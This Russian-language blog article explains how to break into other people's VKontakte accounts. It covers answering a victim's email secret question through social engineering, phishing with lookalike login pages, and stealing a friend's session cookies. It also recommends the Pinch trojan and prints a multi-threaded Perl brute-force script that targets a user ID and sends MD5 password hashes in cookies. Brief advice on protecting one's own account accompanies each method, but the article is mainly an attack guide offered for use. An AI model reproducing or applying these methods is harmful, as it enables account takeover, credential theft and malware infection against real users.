Взлом паролей вконтакте
Редко кто из современных пользователей Интернет не слышал о социальной сети Vkontakte.ru. И естественно все слышали о проблемах конфиденцыальности в этой сети, а также взломе паролей. В этой статье я расскажу как можно взломать пароль вконтакте, и как уберечь свою страницу от подобных прецендентов.
Способов взлома есть очень много. Самым простым из них я считаю взлом через почту. Он может помочь если вы хорошо знаете жертву и знаете ее мейл. Тогда заходите на страницу емейла и нажимаете забыли пароль, вводите мейл и пытаетесь ответить на секретный вопрос. Если жертва вам хорошо знакома, то можно и ответить, а если нет, то можно попробовать узнать так. Например если мейл зарегистрированый в mail.ru, то можно это сделать через мой мир — написать чтото типа, я на сайте новенький(ая) не подскажети можно ли поставить секретный вопрос один, а ответ на него совсем другой. Вы не поверите, но очень часто приходять такие ответы: «Не пережывай, вот у меня например стоит вопрос о питомце, а в ответе номер телефона». Но как я говорил это метод не есть универсальный и подходи для небольшого количества случаев. Но чтобы уберечься от такого способа всегда плучайте что-то в секретных вопросах, и никогда не отвечайте на какие-то вопросы на подобную тематику.
Вторым способом взлома является фейк. Этот метод довольно сложный но универсальный. Фейком называется несуществующая страница вконтакте, похожая на нее как две капли воды, но розмещена по другому адресу, которая ворует логин и пароль. Принцип действия таков: вы любым способом (отправляете на мейл, асю или пишите сообщение вконтакте) подсовываете жертве ссылочку, переходя по которой, она попадает на вход вконтакте, но не на настоящий, а на созданую вами ложную страницу. Но этот этод является по своей сути очень сложным так как ложную страницу написать сможет не каждый. Но сейчас в интернете уже появились готовые фейки. Так что если постаратся, то можно и взломать. Для того что бы не попасть на такую злую «шутку» не надо переходить на подрбные ссылки. Класифицируйте их как спам и все будет хорошо. Также нужно всегда смотреть на адресную строку. Тогда вас может удивить что сайт то вроде ваш любимый контакт, а написано в строке что-то типа http://vk0ntakte.ru
Третим способом является брут, или перебор паролей. Для этого вам нужен специальный скрипт. Я предлагаю вот этот перл. Писал его не я, но это очень хорошый вариант (она же программа для взлома пароля вконтакте):
#!/usr/bin/perl
use IO::Socket;
use MD5;
use threads;
use threads::shared;
my @pass : shared;
######################################
# C!klodoL
# vkontakte.ru bruteforce with multi-threads
######################################
$dic = ‘passl.txt’; #словарь паролей — сборник популярных паролей
$id = 111111; #id цели
$mail = ‘mail%40mail.com’; #Почта. @ должно быть заменено на %40
$threads = 4; #количество потоков
######################################
open (pass, ”<$dic”);
Next:
@pass = pass();
for(0..$threads) {$trl[$_] = threads->create(\&Brut, $_);}
for(@trl) { $_->join; }
sub Brut
{
while
(@pass){
$pass = shift @pass;
$md5 = MD5->hexhash($pass);
$sock = IO::Socket::INET->new(Proto=>’tcp’,PeerAddr=>’vkontakte.ru’,PeerPort=>80);
print $sock ”HEAD http://vkontakte.ru/ HTTP/1.0\r\n”.
”Host: vkontakte.ru\r\n”.
”Accept: */*\r\n”.
”Content-Type: application/x-www-form-urlencoded\r\n”.
”User-Agent: Mozillo\r\n”.
”Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n”.
”Connection: close\r\n\r\n”;
$answ = <$sock>;
close $sock;
print ”$pass $answ”;
if ($answ =~ /302/){
open (good, ‘>>good.txt’);
print good ”$id:$pass:$md5\n”;
print ”$id:$pass:$md5\n”;
close good;
exit;}
}
}
goto Next;
sub pass
{
my (@mas);
while (
){
push @mas, $_;
last if (@mas == 400);
}
chomp @mas;
return @mas;
}
Вам необходим будет словарь паролей (файл в формате txt). Лучше всего использовать как можно больший и сразу на двух языках (русском и английском). Недостатком этого способа является то, что он очень длительный и не всегда результативный. Для того чтобы уберечся от такого способа, необходимо иметь сложный пароль, типа Ze1tj2шo3j. Такой пароль никаким брутом не взломаеш!
Но самым эффективным способом взлома уже многие годы остается троян. Хорошый троян после компиляции на комп жертвы, пришлет вам на мейл ее пароль и емейл. но хорошый троян способен написать только более-менее хорошый0 програмист. Но с этой ситуации есть выход. сейчас в интернете есть очень хорошие трояны на свободном скачивании вместе с инструкциями по приминению, напримр один из лучшых pinch. Но проблемой является то, что почти все трояны видят антивирусы (они не надут скачать его). Плюс к этому, что бы самому не «слить информацию» — работайте с троянами только при выключенном интернете, а потом удаляйте с компьютера.
Ну и пятий вариан. Или вариант-прикол. Там можно разыграть разве только хорошого друга. Приходите к другу в гости и когда у него видите открытий контак, под каким то предлогом отсылаете его, а сами заходите в cookies, находите контакт, копируете реквизиты и скидываете себе на флешку. Дома поступаете таким же самым образом но вместо своих хеш паролей вставляете пароли друга, и вуаля, его страница открыиа для вас.
Теги для поиска: как взламывать страницы в контакте бесплатно по id, взлом страниц в контакте бесплатно
|